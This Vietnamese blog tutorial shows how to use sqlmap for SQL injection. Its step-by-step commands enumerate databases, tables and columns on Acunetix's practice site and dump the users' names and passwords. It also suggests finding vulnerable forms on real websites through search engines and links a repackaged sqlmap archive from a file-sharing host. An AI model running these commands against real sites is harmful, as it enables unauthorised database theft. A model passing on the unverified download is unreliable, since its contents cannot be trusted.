Hướng dẫn sử dụng SQLMAP trên Windows [SQL Injection]


1. SQL Injection là gì ?

– Lỗ hổng SQL Injection là một lổ hỏng khá cơ bản và cũng khá nguy hiểm với các webmaster. Do sự thiếu cẩn trọng trong lúc lập trình hoặc không thể kiểm soát và fillter được hết các form để từ đó các script kiddies tận dụng inject vào thực thi query/command mà không cần login username/password để remote excute, dump data, lấy root sqlsever,..

2. Tìm điểm yếu của website.

– Ta có thể tìm các trang web cho submit dữ liệu ở bất kì một trình tìm kiếm nào trên mạng chẳng hạn như form login, search, feedback,bla bla

3. Target và nội dung của bài viết này.

– Đương nhiên đối với lỗi SQL Injection có rất nhiều kiểu khai thác lỗ hỏng, có thể tự query/command mà không cần sự hỗ trợ từ phần mềm thứ ba, cũng như sử dụng sqlroot, havij, sqlnija,.. Ở đây chúng ta sẽ sử dụng SQLMAP để thực hiện khai thác các lỗ hỏng này.

@.SQLMAP là gì ?

– SQLMAP là công cụ khai thác những lổ hỏng của cơ sở dữ liệu SQL. Công cụ này được xem là công cụ khai thác SQL tốt nhất hiện nay. Được giới bảo mật và giới hacker sử dụng thường xuyên. Với người dùng Kali hoặc Back Track 5 thì SQLMAP đã được tích hợp sẵn vào hệ điều hành. ( Ảnh Minh Họa )

@2.Cách Sử Dụng và Lệnh Thực Thi sqlmap

– Chúng ta sẽ thử nhgiệm trên web của Acunetix,đây là Web test nên không ảnh hưởng gì tới họ.

http://testphp.vulnweb.com/listproducts.php?cat=1

– Để khai thác được database Web của Acunetix,ta thực hiện lệnh sau:

sqlmap.py -u ' ' --dbs


ví dụ:

sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

– Ta có kết quả là:

CXJGVVi

– Tiếp tục khai thác tables trong database acuart bằng cú pháp:

sqlmap.py -u ' ' -D acuart --tables

sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

NgviDJf

– Sau khi có tables ta tiếp tục kiểm tra columns ở đây ta chọn tables users:

sqlmap.py -u ' ' -D acuart -T users --columns

sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

I8FFheq

– Cuối cùng ta dump data của columns users:

sqlmap.py -u ' ' -D ' ' -T ' ' -C ' ' --dump

sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,uname,pass --dump

– Kết.

– Bài viết chỉ mang tính chất nghiên cứu và tham khảo,mình không khuyến thích các bạn sử dụng mục đích xấu và phạm pháp.
– Link Down: http://www.mediafire.com/file/alzfdjco6k5cumh/sqlmap.rar

– Tool đã tích hợp trên Windown để vài ae thỏa sức theo đuổi đam mê
– Mọi thắc mắc hay câu hỏi bạn cmt dưới bài này hoặc liên hệ:
– email: [email protected]

– facebook: GME.Muzigi

Tên tác giả: Muz1gi


Bình luận

Email của bạn sẽ không được hiển thị công khai.

  1. 429329 760392This is the suitable blog for anybody who needs to seek out out about this subject. You notice so a lot its virtually laborious to argue with you (not that I actually would wantHaHa). You undoubtedly put a brand new spin on a subject thats been written about for years. Great stuff, just great! 726464